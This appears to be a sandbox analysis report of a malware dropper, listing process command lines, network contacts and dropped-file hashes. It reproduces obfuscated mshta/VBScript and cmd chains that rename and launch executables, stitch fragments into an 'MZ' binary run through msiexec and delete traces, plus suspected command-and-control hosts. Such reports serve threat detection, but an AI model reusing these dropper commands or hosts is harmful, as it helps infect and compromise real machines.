Wed098e48a54663552b.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe

Wed09a6fb1d0dd846.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe

Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe

Wed0937c2dc68a2496.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0961d5d40c7b937c7.exe

Wed0961d5d40c7b937c7.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe

Wed09a48dab921a3bda7.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 540 -ip 540

C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80260,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 536

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If """" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe

"C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp

"C:\Users\Admin\AppData\Local\Temp\is-V5K5R.tmp\Wed09a6fb1d0dd846.tmp" /SL5="$80292,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If ""== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe" ) do taskkill /f -IM "%~nXN"

C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE

..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbscRIPT: cloSE ( CREAteoBJeCT ( "WScript.SHELL" ). ruN("C:\Windows\system32\cmd.exe /C copy /y ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA &If ""/PVbWtk2ZAwA"" == """" for %N IN ( ""C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE"" ) do taskkill /f -IM ""%~nXN"" " , 0 , TRuE ) )

C:\Windows\SysWOW64\taskkill.exe

taskkill /f -IM "Wed0911cd5800a45.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ..\I8TaQYBpLsJ.ExE &&StarT ..\I8TAQYbpLSJ.eXe /PVbWtk2ZAwA&If "/PVbWtk2ZAwA"== "" for %N IN ("C:\Users\Admin\AppData\Local\Temp\I8TaQYBpLsJ.ExE" ) do taskkill /f -IM "%~nXN"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbsCrIPT: cLOsE ( cREAtEobjEct ( "wSCRIPT.SHEll" ). RUn( "C:\Windows\system32\cmd.exe /C eChO | SEt /P = ""MZ"" >PUVMYbL.81 & CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W " , 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C eChO | SEt /P = "MZ" >PUVMYbL.81 &CopY /y /B PUVMYbl.81 + B0zcQ1x.o + 490lW~.x + LNOSCc5X.DT + Y2YAdQ.8~ + nPI8.L + Fbu1EQ9.~I ..\_ENU.W &Del /Q *& StaRT msiexec /y ..\_enU.W

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" eChO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /P = "MZ" 1>PUVMYbL.81"

C:\Windows\SysWOW64\msiexec.exe

msiexec /y ..\_enU.W

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 sayanu.xyz udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 cdn.discordapp.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 172.67.74.161:443 iplogger.org tcp
US 172.67.74.161:443 iplogger.org tcp
US 8.8.8.8:53 161.74.67.172.in-addr.arpa udp
US 8.8.8.8:53 propanla.com udp
FR 91.121.67.60:2151 tcp
FI 135.181.129.119:4805 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 104.21.5.208:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 235.4.20.104.in-addr.arpa udp
US 8.8.8.8:53 208.5.21.104.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
N/A 127.0.0.1:52238 tcp
N/A 127.0.0.1:52240 tcp
FR 91.121.67.60:2151 tcp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 72.84.118.132:8080 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 futurepreneurs.eu udp
LT 92.61.37.60:443 futurepreneurs.eu tcp
US 8.8.8.8:53 r11.o.lencr.org udp
GB 2.23.210.82:80 r11.o.lencr.org tcp
US 8.8.8.8:53 www.qxsgxd.com udp
US 8.8.8.8:53 60.37.61.92.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 8.8.8.8:53 82.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
NL 194.104.136.5:46013 tcp
US 8.8.8.8:53 t.gogamec.com udp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
FR 91.121.67.60:2151 tcp
US 8.8.8.8:53 t.gogamec.com udp
NL 194.104.136.5:46013 tcp
FI 135.181.129.119:4805 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp

Files

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

MD5 1b16fe969e31beab26afc7060fba271b
SHA1 97f350235d63a11eb5bf555d1d63f8667d47fb31
SHA256 c8345b213f585dffbfc2ec8374dee34b9760c4ce5ddc02414cb90de95dd85e7e
SHA512 90e72cb53e6e983ea3a02aabbb7547873162bdcd47316126c1c7c57efa1104cb6f1f4a0bf5e418a345aba088f23a6d1a02454fb5e50c5222ecfc53fda1ace882

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\setup_install.exe

MD5 3fce5aacf6f9eb4b34126d0c2a9d36c2
SHA1 5590c4402fcda16fe873f857088b4ee6c38858b1
SHA256 ba64bfa019840bf787c93b9f25b6fcce479be24c43a285258174a1a70b9bbf12
SHA512 ed8b38dc4af79c7271412a44ecdcb7e2df0525f314cc52b700ee2e93612c99ccad78a48b657ba5178595d133ad03ed842f4db71165a933fcba0b540f48db58d7

memory/3516-69-0x00000000007B0000-0x000000000083F000-memory.dmp

memory/3516-75-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3516-77-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3516-79-0x000000006FE40000-0x000000006FFC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09c36f786070b6.exe

MD5 a2326dff5589a00ed3fd40bc1bd0f037
SHA1 66c3727fb030f5e1d931de28374cf20e4693bbf4
SHA256 550d66af5c386718a10f69652645f21357d305b3e9477c55516201570f9ea28c
SHA512 fd56a630dc37a5322b68502e66fbe2ff54ae94ca61bf0f8e116db002d4038f85722816a5e8ec0f6c0343d250c93a7909185564166591a44d0402aa0c5928e826

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09f3b13c770637f.exe

MD5 363f9dd72b0edd7f0188224fb3aee0e2
SHA1 2ee4327240df78e318937bc967799fb3b846602e
SHA256 e730ae821668acc373e3126bdba84b6d2b74bfdc183a23bcea5cfc94a4802167
SHA512 72681c776ba5f10e7a9c9e40f419dc79772a1370fd92cfe7f87d48a4baceb1aa381ab3a7b9b6f87780e5ee02fda108158497c13c611d2ece914241920c96aece

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0988d1c2bd9a37.exe

MD5 bdbbf4f034c9f43e4ab00002eb78b990
SHA1 99c655c40434d634691ea1d189b5883f34890179
SHA256 2da3696e82b2a874191a6f4e3bfd26d4b7e5aa5d187c5afdebbe52263dccd5ae
SHA512 dc3e513ad8cbb887652660603ce76437c6d3670637a99c1145c08fa23de658a5c5ca395cc8a2532de7b73302e88e0e8f1c026c4bb1b23481a3a5bb2dc92a68ec

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0937c2dc68a2496.exe

MD5 962b4643e91a2bf03ceeabcdc3d32fff
SHA1 994eac3e4f3da82f19c3373fdc9b0d6697a4375d
SHA256 d2671668c6b2c9da5d319e60dea54361a2cbb362e46628cf0dccb5ff0baf786b
SHA512 ef6f4a5ccfff09506c925003ac49837d771787028fddcf2183e98cba2794df375fd0d5099e36abf8fedfc0dddd10ad076d2fc69a77b8ffd8180215b5cfc88dfd

memory/4472-94-0x0000000004D40000-0x0000000004D76000-memory.dmp

memory/1544-96-0x0000000005170000-0x0000000005798000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed0911cd5800a45.exe

MD5 d165e339ef0c057e20eb61347d06d396
SHA1 cb508e60292616b22f2d7a5ab8f763e4c89cf448
SHA256 ef9dd026b0e39e2a1b0169c19446c98a83d4a2487633c109d0e54e40fb7463c8
SHA512 da6ac858c46cb1f8dd68f03e4550c645c85753d0de4dc0752494c737f4d433bb0e40a5a9de336e211c2e06aa9c6a30484f76baef6892d6a8860f558d1d90f580

memory/3780-109-0x00000000004D0000-0x0000000000540000-memory.dmp

memory/3012-110-0x0000000004890000-0x0000000004906000-memory.dmp

memory/1176-115-0x0000000000780000-0x0000000000788000-memory.dmp

memory/4472-121-0x0000000005CA0000-0x0000000005D06000-memory.dmp

memory/1000-122-0x0000000000620000-0x0000000000690000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-DNP96.tmp\Wed09a6fb1d0dd846.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/4472-131-0x0000000005D10000-0x0000000006064000-memory.dmp

memory/4752-166-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5TKNJ.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\is-5TKNJ.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/4552-162-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/4572-159-0x0000000000400000-0x0000000000414000-memory.dmp

memory/4472-177-0x0000000006740000-0x000000000678C000-memory.dmp

memory/4472-176-0x0000000006300000-0x000000000631E000-memory.dmp

memory/3516-179-0x0000000000400000-0x000000000051C000-memory.dmp

memory/3516-188-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/540-178-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/3516-187-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3516-186-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3516-185-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3516-184-0x000000006EB40000-0x000000006EB63000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a6fb1d0dd846.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

memory/4536-198-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4536-201-0x0000000005230000-0x000000000533A000-memory.dmp

memory/4536-219-0x00000000051A0000-0x00000000051DC000-memory.dmp

memory/2708-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1544-226-0x000000006C6C0000-0x000000006C70C000-memory.dmp

memory/4472-236-0x0000000007D00000-0x000000000837A000-memory.dmp

memory/4472-237-0x0000000007400000-0x000000000741A000-memory.dmp

memory/4472-238-0x0000000007690000-0x000000000769A000-memory.dmp

memory/4472-239-0x0000000007880000-0x0000000007916000-memory.dmp

memory/4472-240-0x0000000007810000-0x0000000007821000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\490lw~.x

MD5 6ba17599a0544b52b5ea5ae9d261658f
SHA1 73637edb407d1a8cb80836b19602611cc71dcdf7
SHA256 2cfefd85953f6aab43cd102651b0a130dbefe37790fa4ca775539c497aa52168
SHA512 5a0424546eb2609128812759fc0d49491562ffdc318597d9b6ef80544fd5d9e70083c91f0313e0bb6c934c5c3201a7a4f6f662b049c543ffe3765d8c665f91c2

memory/4472-264-0x0000000007950000-0x000000000796A000-memory.dmp

memory/1544-265-0x00000000076E0000-0x00000000076E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_enU.W

MD5 13d4be61d9d3c7da927d482b449ff09e
SHA1 57fab8c699c46ff55b74794027201210c001dd0b
SHA256 848085bcebccf4cb84fc3b87fe2d6e38b0d518713146bda312570b82148fa324
SHA512 ac59a4ff77d1d6059af0d20cc91ba9290c9f3116036dcca76bc2a8842137d1db5b5a4a988d7bd269b7072b1f136f5448e51f28bab8f105bcf9234cd471e0b378

memory/2828-277-0x0000000002720000-0x000000000287D000-memory.dmp

memory/760-268-0x0000000002410000-0x000000000256D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Y2Yadq.8~

MD5 6acc22b9c1abe535c6feac6a79db1a18
SHA1 eb94c578b2e6c1bae8a75027f08dcf513e8fb1b9
SHA256 e3870b1f5a9c3be9041d873253e6b0bd89c3fcf05a1a8469ac0e900bc49976ef
SHA512 f99cdc1ff6bb82f73de85144b5be359b661f4bb820f3763d80314357fb7eb5fba812a0d055242e84f14381c4db4caa8fea461782e406e60685082cb8d8e06adf

C:\Users\Admin\AppData\Local\Temp\RarSFX1\lNOSCc5X.Dt

MD5 36fb32e67fa42636817aca7805b49800
SHA1 ae6bdd4bafe6b4a8efeb0f98ac82d1ed4ef07164
SHA256 b040b87c723d23d79034a35fdc82c1f3de3052b489bb7b63e5a505afc5cb3e56
SHA512 56ff53ce8c397867a0ad2f699d3e4441ef0695685636f702db93cb62ffc1c75d33559a92a9286c9f875f2ab2f77034579cc578da427c275c95503edaf78fc42e

C:\Users\Admin\AppData\Local\Temp\RarSFX1\Fbu1EQ9.~I

MD5 b1c69eec40db9d006f8b4df8ac3c038e
SHA1 4fc32d07029329e1e6c374b6af8d1925b1f64546
SHA256 5472aecb24e88b33c5455b9fe0617db16e2ced8016c4655a01c2eb44341671e5
SHA512 e7b4abc277c7901713f33285df92d64d26d1327943f775faf9d353401bafb7b0c9dff1ef519771bd417eec85155f9eeff74fb22976595d0e6d3472b6d17e3f9d

memory/760-278-0x0000000002A20000-0x0000000002AC6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\RarSFX1\B0zcq1x.o

MD5 a6b49368224db5ac48fea0e7215b39d9
SHA1 7385c9cae70f58842c8337ddb038641515e71313
SHA256 fe29f2f6d0ea68365d1e4cf8dab5d6fbf3ea1683964bc1027299069251052262
SHA512 7354e6ba9e478cb40d5efbc392cc911c05b9065bb01c05dfbafaf0ac0a609a07df14b4eb7ff4f18d11022d4c767e7c356a1f9510a249b399fe6b88ed82976e03

C:\Users\Admin\AppData\Local\Temp\RarSFX1\nPI8.L

MD5 e99d5f78660e8ea9d09045c7f1cba42c
SHA1 43ab1072c97572f4e8caefdcbe2d5aa211fd3087
SHA256 3ab51aa79dc557f84729de1001f2ade7bd3900a3a953045de76124aa5e989b98
SHA512 01fc6d11d6a70b352a89f27357323fd3c4b5d93bf3e6a5ee57ba0fa497b2c2665dd33dd0791a85db718debfc88b0b5a44c123964d2460f73e5caf8128b79b831

C:\Users\Admin\AppData\Local\Temp\RarSFX1\PUVMYbL.81

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/760-282-0x0000000002AD0000-0x0000000002B63000-memory.dmp

memory/760-280-0x0000000002AD0000-0x0000000002B63000-memory.dmp

memory/760-279-0x0000000002AD0000-0x0000000002B63000-memory.dmp

memory/4472-255-0x0000000007850000-0x0000000007864000-memory.dmp

memory/4472-253-0x0000000007840000-0x000000000784E000-memory.dmp

memory/4472-225-0x00000000072D0000-0x0000000007373000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed09c36f786070b6.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4472-213-0x00000000068B0000-0x00000000068CE000-memory.dmp

memory/2916-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4472-203-0x000000006C6C0000-0x000000006C70C000-memory.dmp

memory/4472-202-0x0000000007290000-0x00000000072C2000-memory.dmp

memory/4536-200-0x0000000005100000-0x0000000005112000-memory.dmp

memory/4536-199-0x00000000055F0000-0x0000000005C08000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09e3a07534aa.exe

MD5 6b4f4e37bc557393a93d254fe4626bf3
SHA1 b9950d0223789ae109b43308fcaf93cd35923edb
SHA256 7735018dc0d3c4446f932f0062efc3d109313041326f7f1edc6adcc6028f089d
SHA512 a3c6ee81d3f442c4e7d43584c1544e0f402c2441273c99ed799e15d359698db7ee02e770e3ee763bb95ac2e047f59bca3c3f39600d4d5022f82182b14b1fbc0e

memory/3780-145-0x00000000054E0000-0x0000000005A84000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aowvgb3s.rzp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4472-119-0x0000000005430000-0x0000000005452000-memory.dmp

memory/4472-120-0x0000000005C30000-0x0000000005C96000-memory.dmp

memory/3780-118-0x0000000004D90000-0x0000000004DAE000-memory.dmp

memory/744-117-0x0000000000E80000-0x0000000000E86000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS43ED1087\Wed09a48dab921a3bda7.exe

MD5 3bf8a169c55f8b54700880baee9099d7
SHA1 d411f875744aa2cfba6d239bad723cbff4cf771a
SHA256 66a0b83c76b8041ae88433a681fa0e8fbc851bca23fafbedc13e714d522540d2
